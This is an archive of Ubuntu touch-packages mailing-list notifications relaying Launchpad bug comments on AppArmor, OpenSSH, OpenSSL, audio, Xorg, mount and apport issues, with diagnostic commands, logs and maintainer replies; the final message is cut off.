[Touch-packages] [Bug 1117804] Re: ausearch doesn't show AppArmor denial messages
As far as I know, no one has made an effort to try to improve the situation lately. There's some discussion at https://lists.ubuntu.com/archives/apparmor/2024-February/013091.html that may be enlightening, if not encouraging. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to audit in Ubuntu. https://bugs.launchpad.net/bugs/1117804 Title: ausearch doesn't show AppArmor denial messages Status in AppArmor: Confirmed Status in audit package in Ubuntu: Confirmed Status in linux package in Ubuntu: Incomplete Bug description: The following command should display all AVC denials: ausearch -m avc However, it doesn't work with AppArmor denials. Here's a quick test case to generate a denial, search for it with ausearch, and see that no messages are displayed: $ aa-exec -p /usr/sbin/tcpdump cat /proc/self/attr/current cat: /proc/self/attr/current: Permission denied $ sudo ausearch -m avc -c cat ausearch claims that there are no matches, but there's a matching audit message if you look in audit.log: type=AVC msg=audit(1360193426.539:64): apparmor="DENIED" operation="open" parent=8253 profile="/usr/sbin/tcpdump" name="/proc/8485/attr/current" pid=8485 comm="cat" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1117804/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2049402] Re: sshd doesn't properly disable KbdInteractiveAuthentication
** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/2049402 Title: sshd doesn't properly disable KbdInteractiveAuthentication Status in openssh package in Ubuntu: Incomplete Bug description: On 22.04 in OpenSSH_8.9p1 Ubuntu-3ubuntu0.6, OpenSSL 3.0.2 15 Mar 2022 setting KbdInteractiveAuthentication=no in sshd_config does not disable keyboard-interactive authentication. After updating (and restarting the sshd service) `sshd -T` still reports `kbdinteractiveauthentication yes` attempts to connect to sshd also allow keyboard-interactive authentication. Possibly related to https://bugs.archlinux.org/task/71941 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/2049402/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2046844] Re: AppArmor user namespace creation restrictions cause many applications to crash with SIGTRAP
Scarlett, Simon and I had discussed preparing a small program that could prepare a wrapper profile: given a path to an appimage, it could emit a small profile to /etc/apparmor.d/ for the file, with the right attachment path and then load the profile. As I understand our new strategy, it would probably also have to include whatever capabilities that appimage uses as part of setting up the new namespaces -- ideally, it'd be the same capabilities from appimage to appimage. If there's some reasonable restraints on appimages, like using XDG_SOMETHING for user data storage, that might be nice, too. But that's harder to do. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2046844 Title: AppArmor user namespace creation restrictions cause many applications to crash with SIGTRAP Status in akregator package in Ubuntu: Fix Released Status in angelfish package in Ubuntu: In Progress Status in apparmor package in Ubuntu: Confirmed Status in bubblewrap package in Ubuntu: Confirmed Status in cantor package in Ubuntu: Fix Released Status in devhelp package in Ubuntu: Confirmed Status in digikam package in Ubuntu: Fix Released Status in epiphany-browser package in Ubuntu: Confirmed Status in evolution package in Ubuntu: Confirmed Status in falkon package in Ubuntu: Fix Released Status in freecad package in Ubuntu: Confirmed Status in ghostwriter package in Ubuntu: Fix Released Status in gnome-packagekit package in Ubuntu: Confirmed Status in goldendict-webengine package in Ubuntu: Confirmed Status in kalgebra package in Ubuntu: Fix Released Status in kchmviewer package in Ubuntu: Confirmed Status in kdeplasma-addons package in Ubuntu: Confirmed Status in kgeotag package in Ubuntu: In Progress Status in kiwix package in Ubuntu: Confirmed Status in kmail package in Ubuntu: Fix Released Status in konqueror package in Ubuntu: Fix Released Status in kontact package in Ubuntu: Fix Released Status in marble package in Ubuntu: Fix Released Status in notepadqq package in Ubuntu: Confirmed Status in opam package in Ubuntu: Confirmed Status in pageedit package in Ubuntu: Confirmed Status in plasma-desktop package in Ubuntu: Confirmed Status in plasma-welcome package in Ubuntu: In Progress Status in privacybrowser package in Ubuntu: Confirmed Status in qmapshack package in Ubuntu: Confirmed Status in qutebrowser package in Ubuntu: Confirmed Status in rssguard package in Ubuntu: Confirmed Status in steam package in Ubuntu: Confirmed Status in supercollider package in Ubuntu: Confirmed Status in tellico package in Ubuntu: Fix Released Bug description: Hi, I run Ubuntu development branch 24.04 and I have a problem with Epiphany browser 45.1-1 (Gnome Web): program doesn't launch, and I get this error $ epiphany bwrap: Creating new namespace failed: Permission denied ** (epiphany:12085): ERROR **: 14:44:35.023: Failed to fully launch dbus-proxy: Le processus fils s’est terminé avec le code 1 Trappe pour point d'arrêt et de trace (core dumped) $ epiphany bwrap: Creating new namespace failed: Permission denied ** (epiphany:30878): ERROR **: 22:22:26.926: Failed to fully launch dbus-proxy: Le processus fils s’est terminé avec le code 1 Trappe pour point d'arrêt et de trace (core dumped) Thanks for your help! To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/akregator/+bug/2046844/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2055135] Re: [CREF-XX, Conexant SN6140, Black Headphone Out, Left] No sound at all
I suggest talking with the virtualbox devs: [4.040754] UBSAN: array-index-out-of-bounds in /tmp/vbox.0/common/log/log.c:1791:41 It may or may not be related to your audio issues, but it can't be good. Thanks ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to alsa-driver in Ubuntu. https://bugs.launchpad.net/bugs/2055135 Title: [CREF-XX, Conexant SN6140, Black Headphone Out, Left] No sound at all Status in alsa-driver package in Ubuntu: New Bug description: ubuntu-bug -s audio ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: alsa-base 1.0.25+dfsg-0ubuntu7 ProcVersionSignature: Ubuntu 6.5.0-21.21~22.04.1-generic 6.5.8 Uname: Linux 6.5.0-21-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.5 Architecture: amd64 AudioDevicesInUse: USERPID ACCESS COMMAND /dev/snd/controlC0: ronalp 2069 F pulseaudio /dev/snd/pcmC0D0p: ronalp 2069 F...m pulseaudio CasperMD5CheckResult: pass CurrentDesktop: ubuntu:GNOME Date: Tue Feb 27 16:55:13 2024 InstallationDate: Installed on 2024-02-27 (0 days ago) InstallationMedia: Ubuntu 22.04.4 LTS "Jammy Jellyfish" - Release amd64 (20240220) PackageArchitecture: all SourcePackage: alsa-driver Symptom: audio Symptom_AlsaPlaybackTest: ALSA playback test through plughw:sofhdadsp failed Symptom_Card: sof-hda-dsp - sof-hda-dsp Symptom_DevicesInUse: USERPID ACCESS COMMAND /dev/snd/controlC0: ronalp 2069 F pulseaudio /dev/snd/pcmC0D0p: ronalp 2069 F...m pulseaudio Symptom_Jack: Black Headphone Out, Left Symptom_Type: No sound at all Title: [CREF-XX, Conexant SN6140, Black Headphone Out, Left] No sound at all UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 08/11/2023 dmi.bios.release: 1.24 dmi.bios.vendor: HUAWEI dmi.bios.version: 1.24 dmi.board.asset.tag: N/A dmi.board.name: CREF-XX-PCB dmi.board.vendor: HUAWEI dmi.board.version: M1010 dmi.chassis.asset.tag: N/A dmi.chassis.type: 10 dmi.chassis.vendor: HUAWEI dmi.chassis.version: M1010 dmi.ec.firmware.release: 1.24 dmi.modalias: dmi:bvnHUAWEI:bvr1.24:bd08/11/2023:br1.24:efr1.24:svnHUAWEI:pnCREF-XX:pvrM1010:rvnHUAWEI:rnCREF-XX-PCB:rvrM1010:cvnHUAWEI:ct10:cvrM1010:skuC233: dmi.product.family: MateBook dmi.product.name: CREF-XX dmi.product.sku: C233 dmi.product.version: M1010 dmi.sys.vendor: HUAWEI To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/2055135/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2055226] Re: mount option `users` blocks ntfs to mount
Hello, thanks for the report; note that the fstab(5) and mount(8) man pages both say "user", singular, not "users", plural. That's probably why your mount command didn't work when run as a user. I don't know about the gio or udisksctl tool errors, I'm unfamiliar with their operation. Maybe they were also looking for "user"? Thanks ** Information type changed from Private Security to Public ** Changed in: util-linux (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to util-linux in Ubuntu. https://bugs.launchpad.net/bugs/2055226 Title: mount option `users` blocks ntfs to mount Status in util-linux package in Ubuntu: Incomplete Bug description: /etc/fstab: # /media/Sicherung was on /dev/sda7 during installation UUID=2510AA16624BB80C /media/Sicherung ntfs defaults,users,noauto,windows_names,hide_dot_files 0 0 $ gio mount -d /dev/sda7 gio: /dev/sda7: Error mounting system-managed device /dev/sda7: Unknown error when mounting /media/Sicherung $ udisksctl mount -b /dev/sda7 Error mounting /dev/sda7: GDBus.Error:org.freedesktop.UDisks2.Error.Failed: Error mounting system-managed device /dev/sda7: Unknown error when mounting /media/Sicherung $ journalctl -b 0 -u udisks2.service Feb 27 23:48:51 T500 udisksd[10478]: Error opening read-only '/dev/sda7': Keine Berechtigung Feb 27 23:48:51 T500 udisksd[10478]: Failed to mount '/dev/sda7': Keine Berechtigung Feb 27 23:48:51 T500 udisksd[10478]: Please check '/dev/sda7' and the ntfs-3g binary permissions, Feb 27 23:48:51 T500 udisksd[10478]: and the mounting user ID. More explanation is provided at Feb 27 23:48:51 T500 udisksd[10478]: https://github.com/tuxera/ntfs-3g/wiki/NTFS-3G-FAQ This worked fine until Ubuntu 20.04, but since 22.04 I have these errors. Additionally, mount option `users` does not, what it should do: $ LC_ALL=C mount /media/Sicherung Error opening read-only '/dev/sda7': Permission denied Failed to mount '/dev/sda7': Permission denied Please check '/dev/sda7' and the ntfs-3g binary permissions, and the mounting user ID. More explanation is provided at https://github.com/tuxera/ntfs-3g/wiki/NTFS-3G-FAQ When removing `users` from /etc/fstab, it works fine: $ gio mount -d /dev/sda7 $ LC_ALL=C journalctl -b 0 -u udisks2.service Feb 28 00:05:31 T500 ntfs-3g[10977]: Version 2021.8.22 integrated FUSE 28 Feb 28 00:05:31 T500 ntfs-3g[10977]: Mounted /dev/sda7 (Read-Write, label "Sicherung", NTFS 3.1) Feb 28 00:05:31 T500 ntfs-3g[10977]: Cmdline options: rw,windows_names,hide_dot_files Feb 28 00:05:31 T500 ntfs-3g[10977]: Mount options: allow_other,nonempty,relatime,rw,fsname=/dev/sda7,blkdev,blksize=4096 Feb 28 00:05:31 T500 ntfs-3g[10977]: Ownership and permissions disabled, configuration type 7 Feb 28 00:05:31 T500 udisksd[583]: Mounted /dev/sda7 (system) at /media/Sicherung on behalf of uid 1000 So it seems, that option `users` virtually effectuates the opposite, than it is supposed to do. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/util-linux/+bug/2055226/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2055521] Re: Xorg freeze
Hello, thanks for the bug report. I suggest taking your dmesg output (from CurrentDmesg.txt) to the virtualbox developers, it looks very unhappy. Thanks ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/2055521 Title: Xorg freeze Status in xorg package in Ubuntu: New Bug description: System is freeze after opening browsers ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu2 ProcVersionSignature: Ubuntu 6.5.0-21.21~22.04.1-generic 6.5.8 Uname: Linux 6.5.0-21-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.5 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: pass CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins' CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Fri Mar 1 11:59:12 2024 DistUpgraded: Fresh install DistroCodename: jammy DistroVariant: ubuntu ExtraDebuggingInterest: No GraphicsCard: Intel Corporation TigerLake-LP GT2 [Iris Xe Graphics] [8086:9a49] (rev 01) (prog-if 00 [VGA controller]) Subsystem: Dell TigerLake-LP GT2 [Iris Xe Graphics] [1028:0ab0] Subsystem: Dell GP107M [GeForce MX350] [1028:0ab0] InstallationDate: Installed on 2023-12-11 (80 days ago) InstallationMedia: Ubuntu 22.04.3 LTS "Jammy Jellyfish" - Release amd64 (20230807.2) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 003: ID 0c45:6730 Microdia Integrated_Webcam_HD Bus 001 Device 004: ID 0bda:c829 Realtek Semiconductor Corp. Bluetooth Radio Bus 001 Device 002: ID 3554:fc03 CX 2.4G Receiver Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: Dell Inc. Inspiron 15 3511 ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-6.5.0-21-generic root=UUID=400f7ddd-5dab-4879-8016-60995117717f ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display Title: Xorg freeze UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 12/19/2023 dmi.bios.release: 1.26 dmi.bios.vendor: Dell Inc. dmi.bios.version: 1.26.0 dmi.board.name: 0YX04V dmi.board.vendor: Dell Inc. dmi.board.version: A00 dmi.chassis.type: 10 dmi.chassis.vendor: Dell Inc. dmi.modalias: dmi:bvnDellInc.:bvr1.26.0:bd12/19/2023:br1.26:svnDellInc.:pnInspiron153511:pvr:rvnDellInc.:rn0YX04V:rvrA00:cvnDellInc.:ct10:cvr:sku0AB0: dmi.product.family: Inspiron dmi.product.name: Inspiron 15 3511 dmi.product.sku: 0AB0 dmi.sys.vendor: Dell Inc. version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.113-2~ubuntu0.22.04.1 version.libgl1-mesa-dri: libgl1-mesa-dri 23.2.1-1ubuntu3.1~22.04.2 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.xserver-xorg-core: xserver-xorg-core 2:21.1.4-2ubuntu1.7~22.04.8 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2ubuntu1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/2055521/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2059367] Re: SSH-RSA not supported for Self-SSH in Ubuntu 22.04 FIPS
Hello Arunaav, I'm curious if you could double-check the testing environment to make sure the user accounts are as you expected? chmod 0600 /home/core/.ssh/authorized_keys ssh -i .ssh/id_rsa onprem_shell@10.14.169.25 ssh -v user@10.14.169.25 debug1: identity file /root/.ssh/id_rsa type -1 There's usernames 'core', 'onprem_shell', 'user', and 'root' in play here, and I think it'd be extraordinarily easy to perhaps use sudo or another privilege changing tool in such a way that it is using the wrong private key or the wrong authorized_keys file, etc. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/2059367 Title: SSH-RSA not supported for Self-SSH in Ubuntu 22.04 FIPS Status in openssh package in Ubuntu: New Bug description: On a FIPS Enabled Ubuntu 22.04 kernel, we are seeing an issue with self-ssh. We created a key with the following steps: touch /home/core/.ssh/known_hosts ssh-keygen -q -t rsa -f /home/core/.ssh/id_rsa -N '' > /dev/null cp /home/core/.ssh/id_rsa.pub /home/core/.ssh/authorized_keys chmod 0600 /home/core/.ssh/id_rsa chmod 0600 /home/core/.ssh/authorized_keys When we try to do a self ssh with the key, the following happens: ssh -i .ssh/id_rsa onprem_shell@10.14.169.25 Connection closed by 10.14.169.25 port 22 FIPS status: cat /proc/sys/crypto/fips_enabled 1 PFB, the ssh dump: ssh -v user@10.14.169.25 OpenSSH_8.9p1 Ubuntu-3ubuntu0.6+Fips1, OpenSSL 3.0.2 15 Mar 2022 debug1: Reading configuration data /etc/ssh/ssh_config debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf matched no files debug1: /etc/ssh/ssh_config line 21: Applying options for * debug1: FIPS mode initialized debug1: Connecting to 10.14.169.25 [10.14.169.25] port 22. debug1: Connection established. debug1: identity file /root/.ssh/id_rsa type -1 debug1: identity file /root/.ssh/id_rsa-cert type -1 debug1: identity file /root/.ssh/id_ecdsa type -1 debug1: identity file /root/.ssh/id_ecdsa-cert type -1 debug1: identity file /root/.ssh/id_ecdsa_sk type -1 debug1: identity file /root/.ssh/id_ecdsa_sk-cert type -1 debug1: identity file /root/.ssh/id_ed25519 type -1 debug1: identity file /root/.ssh/id_ed25519-cert type -1 debug1: identity file /root/.ssh/id_ed25519_sk type -1 debug1: identity file /root/.ssh/id_ed25519_sk-cert type -1 debug1: identity file /root/.ssh/id_xmss type -1 debug1: identity file /root/.ssh/id_xmss-cert type -1 debug1: identity file /root/.ssh/id_dsa type -1 debug1: identity file /root/.ssh/id_dsa-cert type -1 debug1: Local version string SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6+Fips1 debug1: Remote protocol version 2.0, remote software version OpenSSH_8.9p1 Ubuntu-3ubuntu0.6+Fips1 debug1: compat_banner: match: OpenSSH_8.9p1 Ubuntu-3ubuntu0.6+Fips1 pat OpenSSH* compat 0x0400 debug1: Authenticating to 10.14.169.25:22 as 'user' debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug1: kex: algorithm: ecdh-sha2-nistp256 debug1: kex: host key algorithm: ssh-rsa debug1: kex: server->client cipher: aes128-cbc MAC: hmac-sha1 compression: none debug1: kex: client->server cipher: aes128-cbc MAC: hmac-sha1 compression: none debug1: expecting SSH2_MSG_KEX_ECDH_REPLY Connection closed by 10.14.169.25 port 22 hostname -i 10.14.169.25 Please note that SSH onto other hosts (both FIPS and non-FIPS) works. The only workaround that we have found has been removing the ssh-rsa entry from “HostKeyAlgorithms” in “etc/ssh/sshd_config” and restarting the SSH service. This issue has neither been encountered in the Ubuntu 18.04 FIPS nor Ubuntu 20.04 FIPS. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/2059367/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2057943] Re: Can't disable or modify snap package apparmor rules
I'm adding the snapd package as it feels plausible that snapd could make
this task easier, too.
** Also affects: snapd (Ubuntu)
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2057943
Title:
Can't disable or modify snap package apparmor rules
Status in apparmor package in Ubuntu:
New
Status in snapd package in Ubuntu:
New
Bug description:
On Ubuntu 20.04 (and probably 22.04 and greater), it is impossible to
disable snap chromium apparmor rules:
root@{HOSTNAME}:~# aa-complain snap.chromium.hook.configure
Can't find chromium.hook.configure in the system path list. If the name of
the application
is correct, please run 'which snap.chromium.hook.configure' as a user with
correct PATH
environment set up in order to find the fully-qualified path and
use the full path as parameter.
root@{HOSTNAME}:~# aa-complain snap.chromium.chromedriver -d
/var/lib/snapd/apparmor/profiles
ERROR: Include file /var/lib/snapd/apparmor/profiles/tunables/global not found
root@{HOSTNAME}:~# aa-complain snap.chromium.chromium -d
/var/lib/snapd/apparmor/profiles
ERROR: Include file /var/lib/snapd/apparmor/profiles/tunables/global not found
root@{HOSTNAME}:~# aa-complain snap.chromium.hook.configure -d
/var/lib/snapd/apparmor/profiles
ERROR: Include file /var/lib/snapd/apparmor/profiles/tunables/global
not found
It seems like no one has an answer on how these overly restricted
rules can be disabled:
https://askubuntu.com/questions/1267980/how-to-disable-apparmor-for-chromium-snap-ubuntu-20-04
https://ubuntuforums.org/showthread.php?t=2410550
https://ubuntuforums.org/showthread.php?t=2449022
https://answers.launchpad.net/ubuntu/+source/apparmor/+question/701036
So I just got rid of apparmor which doesn't seem like the solution I
was after, but it works great now:
sudo systemctl stop apparmor
sudo systemctl disable apparmor
Please give us a way to modify (and keep the rules permanently
modified even after snap updates) snap apparmor rules.
Thank you!
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2057943/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2058690] Re: aa-easyprof: allow mmap and link from easyprof generated profiles
The 'm' permission shouldn't be a default; restricting what the CPU will execute is a very useful security mitigation. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2058690 Title: aa-easyprof: allow mmap and link from easyprof generated profiles Status in apparmor package in Ubuntu: New Bug description: Currently, an easyprof-generated profile will list the reads with `rk` and the writes as `rwk`. With recent Qt, this breaks because newer Qt versions use hard-linking of temporary files to perform atomic writes. Also, `rk` doesn't allow mmap()'ing shared library for execution. We at UBports are carrying a patch in Ubuntu Touch which changes the read rules to `mrk` and write rules to `mrwkl`, and are upstreaming this patch at [1]. When the MR is merged, I would like this patch to be included in Ubuntu 24.04, so that Ubuntu Touch doesn't have to package AppArmor separately from Ubuntu. If we agree that we want this patch, I can provide an MR on Salsa. [1] https://gitlab.com/apparmor/apparmor/-/merge_requests/1189 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2058690/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2061869] Re: Snaps unable to connect to network under linux-lowlatency 6.8.0-25.25.3
*** This bug is a duplicate of bug 2061851 *** https://bugs.launchpad.net/bugs/2061851 ** This bug has been marked a duplicate of bug 2061851 linux-gcp 6.8.0-1005.5 (+ others) Noble kernel regression with new apparmor profiles/features -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2061869 Title: Snaps unable to connect to network under linux-lowlatency 6.8.0-25.25.3 Status in apparmor package in Ubuntu: Confirmed Status in linux-lowlatency package in Ubuntu: Confirmed Bug description: After upgrading to linux-lowlatency 6.8.0-25, suddenly snaps can no longer connect to network. I tried downgrading snapd from edge, still no connectivity. Only solution was to downgrade back to 6.8.0-7. I'll also add apparmor in case this is an apparmor issue as well. Marking as "critical" priority as this affects all installs of Ubuntu Studio and affects Firefox and Thunderbird. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2061869/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2063271] Re: Illegal opcode in libssl
** Package changed: openssh (Ubuntu) => openssl (Ubuntu) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/2063271 Title: Illegal opcode in libssl Status in openssl package in Ubuntu: New Bug description: Many programs using openssl now fail, typically with messages such as Illegal instruction (core dumped) This seems to be a serious error, since it affects, for example, update-manager. Since this makes it harder to get security updates, I would also consider it a security vulnerability. The issue seems to be that openssl seems to be an attempt to use an illegal opcode. A few sample entries in /var/log/syslog are: Apr 21 19:16:39 einstein kernel: [495465.431588] traps: update-manager[396881] trap invalid opcode ip:740964b8ac6b sp:7409552125b0 error:0 in libssl.so.3[740964b7a000+5b000] Apr 21 19:16:55 einstein kernel: [495482.104658] traps: python3[396949] trap invalid opcode ip:73607be8ac6b sp:736074d8d5b0 error:0 in libssl.so.3[73607be7a000+5b000] Apr 21 19:40:05 einstein kernel: [496871.653271] traps: chrome-gnome-sh[397293] trap invalid opcode ip:79432ffa7c6b sp:7ffd6bc03e70 error:0 in libssl.so.3[79432ff97000+5b000] Apr 22 16:23:08 einstein kernel: [501744.765118] traps: check-new-relea[400397] trap invalid opcode ip:797c7cc8ac6b sp:797c6cace5b0 error:0 in libssl.so.3[797c7cc7a000+5b000] Apr 23 15:08:03 einstein kernel: [518701.050526] traps: wget[443588] trap invalid opcode ip:73a8b2eb4c6b sp:7ffc04918740 error:0 in libssl.so.3[73a8b2ea4000+5b000] Apr 23 15:12:55 einstein kernel: [518992.493020] traps: curl[443851] trap invalid opcode ip:7e4e3951dc6b sp:7ffc804d2ed0 error:0 in libssl.so.3[7e4e3950d000+5b000] Apr 23 15:13:32 einstein kernel: [519029.181422] traps: apport-gtk[04] trap invalid opcode ip:7039180f5c6b sp:703902bfaad0 error:0 in libssl.so.3[7039180e5000+5b000] This bug report itself had to be submitted manually since ubuntu-bug now itself fails. lsb_release -rd reports: Description:Ubuntu 22.04.4 LTS Release:22.04 apt-cache policy openssl reports: openssl: Installed: 3.0.2-0ubuntu1.15 Candidate: 3.0.2-0ubuntu1.15 Version table: *** 3.0.2-0ubuntu1.15 500 500 http://us.archive.ubuntu.com/ubuntu jammy-updates/main amd64 Packages 500 http://security.ubuntu.com/ubuntu jammy-security/main amd64 Packages 100 /var/lib/dpkg/status 3.0.2-0ubuntu1 500 500 http://us.archive.ubuntu.com/ubuntu jammy/main amd64 Packages /proc/version for my computer gives Linux version 6.5.0-28-generic (buildd@lcy02-amd64-098) (x86_64-linux-gnu-gcc-12 (Ubuntu 12.3.0-1ubuntu1~22.04) 12.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #29~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr 4 14:39:20 UTC 2 /proc/cpuinfo for my computer starts processor : 0 vendor_id : GenuineIntel cpu family: 6 model : 78 model name: Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz stepping : 3 microcode : 0xf0 cpu MHz : 500.018 cache size: 4096 KB physical id : 0 siblings : 4 core id : 0 cpu cores : 2 apicid: 0 initial apicid: 0 fpu : yes fpu_exception : yes cpuid level : 22 wp: yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid mpx rdseed adx smap clflushopt intel_pt xsaveopt xsavec xgetbv1 xsaves dtherm ida arat pln pts hwp hwp_notify hwp_act_window hwp_epp md_clear flush_l1d arch_capabilities bugs : cpu_meltdown spectre_v1 spectre_v2 spec_store_bypass l1tf mds swapgs itlb_multihit srbds mmio_stale_data retbleed gds bogomips : 5199.98 clflush size : 64 cache_alignment : 64 address sizes : 39 bits physical, 48 bits virtual power management: ... To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/2063271/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2063884] [NEW] ubuntu-bug can't report bugs in Ubuntu Pro packages
Public bug reported: Hello, ubuntu-bug can't report bugs in packages provided by Ubuntu Pro. For example, I have lynx installed, which has an update issued through esm-apps: $ dpkg -l lynx | grep ^ii ii lynx 2.9.0dev.5-1ubuntu0.1~esm1 amd64classic non-graphical (text-mode) web browser $ ubuntu-bug lynx *** Collecting problem information The collected information can be sent to the developers to improve the application. This might take a few minutes. . *** Problem in lynx The problem cannot be reported: This is not an official Ubuntu package. Please remove any third party package and try again. Press any key to continue... ^? No pending crash reports. Try --help for more information. ** Affects: apport (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/2063884 Title: ubuntu-bug can't report bugs in Ubuntu Pro packages Status in apport package in Ubuntu: New Bug description: Hello, ubuntu-bug can't report bugs in packages provided by Ubuntu Pro. For example, I have lynx installed, which has an update issued through esm-apps: $ dpkg -l lynx | grep ^ii ii lynx 2.9.0dev.5-1ubuntu0.1~esm1 amd64classic non-graphical (text-mode) web browser $ ubuntu-bug lynx *** Collecting problem information The collected information can be sent to the developers to improve the application. This might take a few minutes. . *** Problem in lynx The problem cannot be reported: This is not an official Ubuntu package. Please remove any third party package and try again. Press any key to continue... ^? No pending crash reports. Try --help for more information. To manage 